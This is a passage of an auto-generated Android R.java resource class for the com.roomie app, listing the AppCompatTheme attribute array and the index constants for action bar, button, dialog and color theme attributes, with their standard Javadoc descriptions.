#AppCompatTheme_alertDialogButtonGroupStyle @see #AppCompatTheme_alertDialogCenterButtons @see #AppCompatTheme_alertDialogStyle @see #AppCompatTheme_alertDialogTheme @see #AppCompatTheme_android_windowAnimationStyle @see #AppCompatTheme_android_windowIsFloating @see #AppCompatTheme_autoCompleteTextViewStyle @see #AppCompatTheme_borderlessButtonStyle @see #AppCompatTheme_buttonBarButtonStyle @see #AppCompatTheme_buttonBarNegativeButtonStyle @see #AppCompatTheme_buttonBarNeutralButtonStyle @see #AppCompatTheme_buttonBarPositiveButtonStyle @see #AppCompatTheme_buttonBarStyle @see #AppCompatTheme_buttonStyle @see #AppCompatTheme_buttonStyleSmall @see #AppCompatTheme_checkboxStyle @see #AppCompatTheme_checkedTextViewStyle @see #AppCompatTheme_colorAccent @see #AppCompatTheme_colorBackgroundFloating @see #AppCompatTheme_colorButtonNormal @see #AppCompatTheme_colorControlActivated @see #AppCompatTheme_colorControlHighlight @see #AppCompatTheme_colorControlNormal @see #AppCompatTheme_colorError @see #AppCompatTheme_colorPrimary @see #AppCompatTheme_colorPrimaryDark @see #AppCompatTheme_colorSwitchThumbNormal @see #AppCompatTheme_controlBackground @see #AppCompatTheme_dialogCornerRadius @see #AppCompatTheme_dialogPreferredPadding @see #AppCompatTheme_dialogTheme @see #AppCompatTheme_dividerHorizontal @see #AppCompatTheme_dividerVertical @see #AppCompatTheme_dropDownListViewStyle @see #AppCompatTheme_dropdownListPreferredItemHeight @see #AppCompatTheme_editTextBackground @see #AppCompatTheme_editTextColor @see #AppCompatTheme_editTextStyle @see #AppCompatTheme_homeAsUpIndicator @see #AppCompatTheme_imageButtonStyle @see #AppCompatTheme_listChoiceBackgroundIndicator @see #AppCompatTheme_listDividerAlertDialog @see #AppCompatTheme_listMenuViewStyle @see #AppCompatTheme_listPopupWindowStyle @see #AppCompatTheme_listPreferredItemHeight @see #AppCompatTheme_listPreferredItemHeightLarge @see #AppCompatTheme_listPreferredItemHeightSmall @see #AppCompatTheme_listPreferredItemPaddingLeft @see #AppCompatTheme_listPreferredItemPaddingRight @see #AppCompatTheme_panelBackground @see #AppCompatTheme_panelMenuListTheme @see #AppCompatTheme_panelMenuListWidth @see #AppCompatTheme_popupMenuStyle @see #AppCompatTheme_popupWindowStyle @see #AppCompatTheme_radioButtonStyle @see #AppCompatTheme_ratingBarStyle @see #AppCompatTheme_ratingBarStyleIndicator @see #AppCompatTheme_ratingBarStyleSmall @see #AppCompatTheme_searchViewStyle @see #AppCompatTheme_seekBarStyle @see #AppCompatTheme_selectableItemBackground @see #AppCompatTheme_selectableItemBackgroundBorderless @see #AppCompatTheme_spinnerDropDownItemStyle @see #AppCompatTheme_spinnerStyle @see #AppCompatTheme_switchStyle @see #AppCompatTheme_textAppearanceLargePopupMenu @see #AppCompatTheme_textAppearanceListItem @see #AppCompatTheme_textAppearanceListItemSecondary @see #AppCompatTheme_textAppearanceListItemSmall @see #AppCompatTheme_textAppearancePopupMenuHeader @see #AppCompatTheme_textAppearanceSearchResultSubtitle @see #AppCompatTheme_textAppearanceSearchResultTitle @see #AppCompatTheme_textAppearanceSmallPopupMenu @see #AppCompatTheme_textColorAlertDialogListItem @see #AppCompatTheme_textColorSearchUrl @see #AppCompatTheme_toolbarNavigationButtonStyle @see #AppCompatTheme_toolbarStyle @see #AppCompatTheme_tooltipForegroundColor @see #AppCompatTheme_tooltipFrameBackground @see #AppCompatTheme_viewInflaterClass @see #AppCompatTheme_windowActionBar @see #AppCompatTheme_windowActionBarOverlay @see #AppCompatTheme_windowActionModeOverlay @see #AppCompatTheme_windowFixedHeightMajor @see #AppCompatTheme_windowFixedHeightMinor @see #AppCompatTheme_windowFixedWidthMajor @see #AppCompatTheme_windowFixedWidthMinor @see #AppCompatTheme_windowMinWidthMajor @see #AppCompatTheme_windowMinWidthMinor @see #AppCompatTheme_windowNoTitle */ public static final int[] AppCompatTheme = { 0x01010057, 0x010100ae, 0x7f010061, 0x7f010062, 0x7f010063, 0x7f010064, 0x7f010065, 0x7f010066, 0x7f010067, 0x7f010068, 0x7f010069, 0x7f01006a, 0x7f01006b, 0x7f01006c, 0x7f01006d, 0x7f01006e, 0x7f01006f, 0x7f010070, 0x7f010071, 0x7f010072, 0x7f010073, 0x7f010074, 0x7f010075, 0x7f010076, 0x7f010077, 0x7f010078, 0x7f010079, 0x7f01007a, 0x7f01007b, 0x7f01007c, 0x7f01007d, 0x7f01007e, 0x7f01007f, 0x7f010080, 0x7f010081, 0x7f010082, 0x7f010083, 0x7f010084, 0x7f010085, 0x7f010086, 0x7f010087, 0x7f010088, 0x7f010089, 0x7f01008a, 0x7f01008b, 0x7f01008c, 0x7f01008d, 0x7f01008e, 0x7f01008f, 0x7f010090, 0x7f010091, 0x7f010092, 0x7f010093, 0x7f010094, 0x7f010095, 0x7f010096, 0x7f010097, 0x7f010098, 0x7f010099, 0x7f01009a, 0x7f01009b, 0x7f01009c, 0x7f01009d, 0x7f01009e, 0x7f01009f, 0x7f0100a0, 0x7f0100a1, 0x7f0100a2, 0x7f0100a3, 0x7f0100a4, 0x7f0100a5, 0x7f0100a6, 0x7f0100a7, 0x7f0100a8, 0x7f0100a9, 0x7f0100aa, 0x7f0100ab, 0x7f0100ac, 0x7f0100ad, 0x7f0100ae, 0x7f0100af, 0x7f0100b0, 0x7f0100b1, 0x7f0100b2, 0x7f0100b3, 0x7f0100b4, 0x7f0100b5, 0x7f0100b6, 0x7f0100b7, 0x7f0100b8, 0x7f0100b9, 0x7f0100ba, 0x7f0100bb, 0x7f0100bc, 0x7f0100bd, 0x7f0100be, 0x7f0100bf, 0x7f0100c0, 0x7f0100c1, 0x7f0100c2, 0x7f0100c3, 0x7f0100c4, 0x7f0100c5, 0x7f0100c6, 0x7f0100c7, 0x7f0100c8, 0x7f0100c9, 0x7f0100ca, 0x7f0100cb, 0x7f0100cc, 0x7f0100cd, 0x7f0100ce, 0x7f0100cf, 0x7f0100d0, 0x7f0100d1, 0x7f0100d2, 0x7f0100d3, 0x7f0100d4, 0x7f0100d5, 0x7f0100d6, 0x7f0100d7 }; /** <p> @attr description Custom divider drawable to use for elements in the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionBarDivider */ public static final int AppCompatTheme_actionBarDivider = 23; /** <p> @attr description Custom item state list drawable background for action bar items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionBarItemBackground */ public static final int AppCompatTheme_actionBarItemBackground = 24; /** <p> @attr description Reference to a theme that should be used to inflate popups shown by widgets in the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionBarPopupTheme */ public static final int AppCompatTheme_actionBarPopupTheme = 17; /** <p> @attr description Size of the Action Bar, including the contextual bar used to present Action Modes. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>wrap_content</code></td><td>0</td><td></td></tr> </table> <p>This is a private symbol. @attr name com.roomie:actionBarSize */ public static final int AppCompatTheme_actionBarSize = 22; /** <p> @attr description Reference to a style for the split Action Bar. This style controls the split component that holds the menu/action buttons. actionBarStyle is still used for the primary bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionBarSplitStyle */ public static final int AppCompatTheme_actionBarSplitStyle = 19; /** <p> @attr description Reference to a style for the Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionBarStyle */ public static final int AppCompatTheme_actionBarStyle = 18; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#actionBarTabBarStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:actionBarTabBarStyle */ public static final int AppCompatTheme_actionBarTabBarStyle = 13; /** <p> @attr description Default style for tabs within an action bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionBarTabStyle */ public static final int AppCompatTheme_actionBarTabStyle = 12; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#actionBarTabTextStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:actionBarTabTextStyle */ public static final int AppCompatTheme_actionBarTabTextStyle = 14; /** <p> @attr description Reference to a theme that should be used to inflate the action bar. This will be inherited by any widget inflated into the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionBarTheme */ public static final int AppCompatTheme_actionBarTheme = 20; /** <p> @attr description Reference to a theme that should be used to inflate widgets and layouts destined for the action bar. Most of the time this will be a reference to the current theme, but when the action bar has a significantly different contrast profile than the rest of the activity the difference can become important. If this is set to @null the current theme will be used. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionBarWidgetTheme */ public static final int AppCompatTheme_actionBarWidgetTheme = 21; /** <p> @attr description Default action button style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionButtonStyle */ public static final int AppCompatTheme_actionButtonStyle = 51; /** <p> @attr description Default ActionBar dropdown style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionDropDownStyle */ public static final int AppCompatTheme_actionDropDownStyle = 47; /** <p> @attr description TextAppearance style that will be applied to text that appears within action menu items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionMenuTextAppearance */ public static final int AppCompatTheme_actionMenuTextAppearance = 25; /** <p> @attr description Color for text that appears within action menu items. Color for text that appears within action menu items. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:actionMenuTextColor */ public static final int AppCompatTheme_actionMenuTextColor = 26; /** <p> @attr description Background drawable to use for action mode UI <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeBackground */ public static final int AppCompatTheme_actionModeBackground = 29; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#actionModeCloseButtonStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:actionModeCloseButtonStyle */ public static final int AppCompatTheme_actionModeCloseButtonStyle = 28; /** <p> @attr description Drawable to use for the close action mode button <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeCloseDrawable */ public static final int AppCompatTheme_actionModeCloseDrawable = 31; /** <p> @attr description Drawable to use for the Copy action button in Contextual Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeCopyDrawable */ public static final int AppCompatTheme_actionModeCopyDrawable = 33; /** <p> @attr description Drawable to use for the Cut action button in Contextual Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeCutDrawable */ public static final int AppCompatTheme_actionModeCutDrawable = 32; /** <p> @attr description Drawable to use for the Find action button in WebView selection action modes <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeFindDrawable */ public static final int AppCompatTheme_actionModeFindDrawable = 37; /** <p> @attr description Drawable to use for the Paste action button in Contextual Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModePasteDrawable */ public static final int AppCompatTheme_actionModePasteDrawable = 34; /** <p> @attr description PopupWindow style to use for action modes when showing as a window overlay. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModePopupWindowStyle */ public static final int AppCompatTheme_actionModePopupWindowStyle = 39; /** <p> @attr description Drawable to use for the Select all action button in Contextual Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeSelectAllDrawable */ public static final int AppCompatTheme_actionModeSelectAllDrawable = 35; /** <p> @attr description Drawable to use for the Share action button in WebView selection action modes <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeShareDrawable */ public static final int AppCompatTheme_actionModeShareDrawable = 36; /** <p> @attr description Background drawable to use for action mode UI in the lower split bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeSplitBackground */ public static final int AppCompatTheme_actionModeSplitBackground = 30; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#actionModeStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:actionModeStyle */ public static final int AppCompatTheme_actionModeStyle = 27; /** <p> @attr description Drawable to use for the Web Search action button in WebView selection action modes <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:actionModeWebSearchDrawable */ public static final int AppCompatTheme_actionModeWebSearchDrawable = 38; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#actionOverflowButtonStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:actionOverflowButtonStyle */ public static final int AppCompatTheme_actionOverflowButtonStyle = 15; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#actionOverflowMenuStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:actionOverflowMenuStyle */ public static final int AppCompatTheme_actionOverflowMenuStyle = 16; /** <p> @attr description Default ActivityChooserView style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:activityChooserViewStyle */ public static final int AppCompatTheme_activityChooserViewStyle = 59; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#alertDialogButtonGroupStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:alertDialogButtonGroupStyle */ public static final int AppCompatTheme_alertDialogButtonGroupStyle = 96; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#alertDialogCenterButtons} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:alertDialogCenterButtons */ public static final int AppCompatTheme_alertDialogCenterButtons = 97; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#alertDialogStyle} attribute's value can be found in the {@link #AppCompatTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:alertDialogStyle */ public static final int AppCompatTheme_alertDialogStyle = 95; /** <p> @attr description Theme to use for alert dialogs spawned from this theme. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:alertDialogTheme */ public static final int AppCompatTheme_alertDialogTheme = 98; /** <p>This symbol is the offset where the {@link android.R.attr#windowAnimationStyle} attribute's value can be found in the {@link #AppCompatTheme} array. @attr name android:windowAnimationStyle */ public static final int AppCompatTheme_android_windowAnimationStyle = 1; /** <p>This symbol is the offset where the {@link android.R.attr#windowIsFloating} attribute's value can be found in the {@link #AppCompatTheme} array. @attr name android:windowIsFloating */ public static final int AppCompatTheme_android_windowIsFloating = 0; /** <p> @attr description Default AutoCompleteTextView style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:autoCompleteTextViewStyle */ public static final int AppCompatTheme_autoCompleteTextViewStyle = 103; /** <p> @attr description Style for buttons without an explicit border, often used in groups. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:borderlessButtonStyle */ public static final int AppCompatTheme_borderlessButtonStyle = 56; /** <p> @attr description Style for buttons within button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:buttonBarButtonStyle */ public static final int AppCompatTheme_buttonBarButtonStyle = 53; /** <p> @attr description Style for the "negative" buttons within button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:buttonBarNegativeButtonStyle */ public static final int AppCompatTheme_buttonBarNegativeButtonStyle = 101; /** <p> @attr description Style for the "neutral" buttons within button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:buttonBarNeutralButtonStyle */ public static final int AppCompatTheme_buttonBarNeutralButtonStyle = 102; /** <p> @attr description Style for the "positive" buttons within button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:buttonBarPositiveButtonStyle */ public static final int AppCompatTheme_buttonBarPositiveButtonStyle = 100; /** <p> @attr description Style for button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:buttonBarStyle */ public static final int AppCompatTheme_buttonBarStyle = 52; /** <p> @attr description Normal Button style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:buttonStyle */ public static final int AppCompatTheme_buttonStyle = 104; /** <p> @attr description Small Button style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:buttonStyleSmall */ public static final int AppCompatTheme_buttonStyleSmall = 105; /** <p> @attr description Default Checkbox style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:checkboxStyle */ public static final int AppCompatTheme_checkboxStyle = 106; /** <p> @attr description Default CheckedTextView style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:checkedTextViewStyle */ public static final int AppCompatTheme_checkedTextViewStyle = 107; /** <p> @attr description Bright complement to the primary branding color. By default, this is the color applied to framework controls (via colorControlActivated). <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorAccent */ public static final int AppCompatTheme_colorAccent = 87; /** <p> @attr description Default color of background imagery for floating components, ex. dialogs, popups, and cards. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorBackgroundFloating */ public static final int AppCompatTheme_colorBackgroundFloating = 94; /** <p> @attr description The color applied to framework buttons in their normal state. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorButtonNormal */ public static final int AppCompatTheme_colorButtonNormal = 91; /** <p> @attr description The color applied to framework controls in their activated (ex. checked) state. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorControlActivated */ public static final int AppCompatTheme_colorControlActivated = 89; /** <p> @attr description The color applied to framework control highlights (ex. ripples, list selectors). <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorControlHighlight */ public static final int AppCompatTheme_colorControlHighlight = 90; /** <p> @attr description The color applied to framework controls in their normal state. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorControlNormal */ public static final int AppCompatTheme_colorControlNormal = 88; /** <p> @attr description Color used for error states and things that need to be drawn to the user's attention. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:colorError */ public static final int AppCompatTheme_colorError = 119; /** <p> @attr description The primary branding color for the app. By default, this is the color applied to the action bar background. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorPrimary */ public static final int AppCompatTheme_colorPrimary = 85; /** <p> @attr description Dark variant of the primary branding color. By default, this is the color applied to the status bar (via statusBarColor) and navigation bar (via navigationBarColor). <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorPrimaryDark */ public static final int AppCompatTheme_colorPrimaryDark = 86; /** <p> @attr description The color applied to framework switch thumbs in their normal state. <p>Must be a color value, in the form of 